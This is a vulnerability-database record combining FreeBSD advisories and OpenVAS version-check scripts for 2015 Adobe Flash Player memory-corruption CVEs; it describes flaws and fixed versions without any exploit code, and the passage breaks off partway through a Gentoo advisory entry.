"freebsd": [{"lastseen": "2019-05-29T18:33:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe is aware of a report that an exploit for\n\t CVE-2015-3043 exists in the wild, and recommends users update their\n\t product installations to the latest versions.\n\t \n\n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n\t CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n\t CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-0356).\n\t \n\n\t These updates resolve a buffer overflow vulnerability that could\n\t lead to code execution (CVE-2015-0348).\n\t \n\n\t These updates resolve use-after-free vulnerabilities that could lead\n\t to code execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n\t CVE-2015-3039).\n\t \n\n\t These updates resolve double-free vulnerabilities that could lead to\n\t code execution (CVE-2015-0346, CVE-2015-0359).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-0357, CVE-2015-3040).\n\t \n\n\t These updates resolve a security bypass vulnerability that could\n\t lead to information disclosure (CVE-2015-3044).\n\t \n\n\n", "edition": 4, "modified": "2015-04-14T00:00:00", "published": "2015-04-14T00:00:00", "id": "3364D497-E4E6-11E4-A265-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/3364d497-e4e6-11e4-a265-c485083ca99c.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "\nAdobe reports:\n\n\n\t Adobe has released security updates for Adobe Flash Player for\n\t Windows, Macintosh and Linux. These updates address vulnerabilities\n\t that could potentially allow an attacker to take control of the\n\t affected system. Adobe recommends users update their product\n\t installations to the latest versions.\n\t \n\n\t These updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n\t CVE-2015-3093).\n\t \n\n\t These updates resolve a heap overflow vulnerability that could lead\n\t to code execution (CVE-2015-3088).\n\t \n\n\t These updates resolve a time-of-check time-of-use (TOCTOU) race\n\t condition that could be exploited to bypass Protected Mode in\n\t Internet Explorer (CVE-2015-3081).\n\t \n\n\t These updates resolve validation bypass issues that could be\n\t exploited to write arbitrary data to the file system under user\n\t permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\t \n\n\t These updates resolve an integer overflow vulnerability that could\n\t lead to code execution (CVE-2015-3087).\n\t \n\n\t These updates resolve a type confusion vulnerability that could lead\n\t to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\t \n\n\t These updates resolve a use-after-free vulnerability that could lead\n\t to code execution (CVE-2015-3080).\n\t \n\n\t These updates resolve memory leak vulnerabilities that could be used\n\t to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\t \n\n\t These updates resolve a security bypass vulnerability that could lead\n\t to information disclosure (CVE-2015-3079), and provide additional\n\t hardening to protect against CVE-2015-3044.\n\t \n\n", "edition": 4, "modified": "2015-05-12T00:00:00", "published": "2015-05-12T00:00:00", "id": "E206DF57-F97B-11E4-B799-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/e206df57-f97b-11e4-b799-c485083ca99c.html", "title": "Adobe Flash Player -- critical vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:38:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310850878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850878", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:0723-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850878\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:22:27 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:0723-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to version 11.2.202.457 to fix several\n security issues that could have lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities have been fixed:\n\n * Memory corruption vulnerabilities that could have lead to code\n execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n * Type confusion vulnerability that could have lead to code execution\n (CVE-2015-0356).\n\n * Buffer overflow vulnerability that could have lead to code execution\n (CVE-2015-0348).\n\n * Use-after-free vulnerabilities that could have lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n\n * Double-free vulnerabilities that could have lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n\n * Memory leak vulnerabilities that could have been used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n\n * Security bypass vulnerability that could have lead to information\n disclosure (CVE-2015-3044).\n\n Security Issues:\n\n * CVE-2015-0346\n\n * CVE-2015-0347\n\n * CVE-2015-0348\n\n * CVE-2015-0349\n\n * CVE-2015-0350\n\n * CVE-2015-0351\n\n * CVE-2015-0352\n\n * CVE-2015-0353\n\n * CVE-2015-0354\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0723-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.457~0.3.1\", rls:\"SLED11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805464", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805464\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 12:39:25 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.281 or 17.0.0.169 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.281\"))\n{\n fix = \"13.0.0.281\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"17.0.0.168\"))\n{\n fix = \"17.0.0.169\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851029", "type": "openvas", "title": "SUSE: Security Advisory for Adobe (SUSE-SU-2015:0722-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851029\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 18:00:29 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Adobe (SUSE-SU-2015:0722-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Adobe'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\");\n\n script_tag(name:\"affected\", value:\"Adobe on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0722-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.457~80.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.457~80.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:12:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2015-04-20T00:00:00", "id": "OPENVAS:1361412562310805466", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805466", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805466\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3043\", \"CVE-2015-3042\", \"CVE-2015-3041\",\n \"CVE-2015-3040\", \"CVE-2015-3039\", \"CVE-2015-3038\", \"CVE-2015-0360\",\n \"CVE-2015-0359\", \"CVE-2015-0357\", \"CVE-2015-0356\", \"CVE-2015-0355\",\n \"CVE-2015-0354\", \"CVE-2015-0353\", \"CVE-2015-0352\", \"CVE-2015-0351\",\n \"CVE-2015-0350\", \"CVE-2015-0349\", \"CVE-2015-0348\", \"CVE-2015-0347\",\n \"CVE-2015-0346\", \"CVE-2015-0358\");\n script_bugtraq_id(74065, 74062, 74068, 74064, 74067, 74066, 74069);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-20 14:39:25 +0530 (Mon, 20 Apr 2015)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple unspecified use-after-free errors.\n\n - Multiple unspecified double free vulnerabilities.\n\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n\n - Improper restriction of discovery of memory addresses.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause denial of service, execute arbitrary code, bypass the ASLR\n protection mechanism via unspecified vectors and allow local users to gain\n privileges .\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.457 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.457 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.457\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.457\" + '\\n';\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Gentoo Linux Local Security Checks GLSA 201504-07", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121374", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201504-07", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201504-07.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121374\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:48 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201504-07\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201504-07\");\n script_cve_id(\"CVE-2015-0346\", \"CVE-2015-0347\", \"CVE-2015-0348\", \"CVE-2015-0349\", \"CVE-2015-0350\", \"CVE-2015-0351\", \"CVE-2015-0352\", \"CVE-2015-0353\", \"CVE-2015-0354\", \"CVE-2015-0355\", \"CVE-2015-0356\", \"CVE-2015-0357\", \"CVE-2015-0358\", \"CVE-2015-0359\", \"CVE-2015-0360\", \"CVE-2015-3038\", \"CVE-2015-3039\", \"CVE-2015-3040\", \"CVE-2015-3041\", \"CVE-2015-3042\", \"CVE-2015-3043\", \"CVE-2015-3044\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", 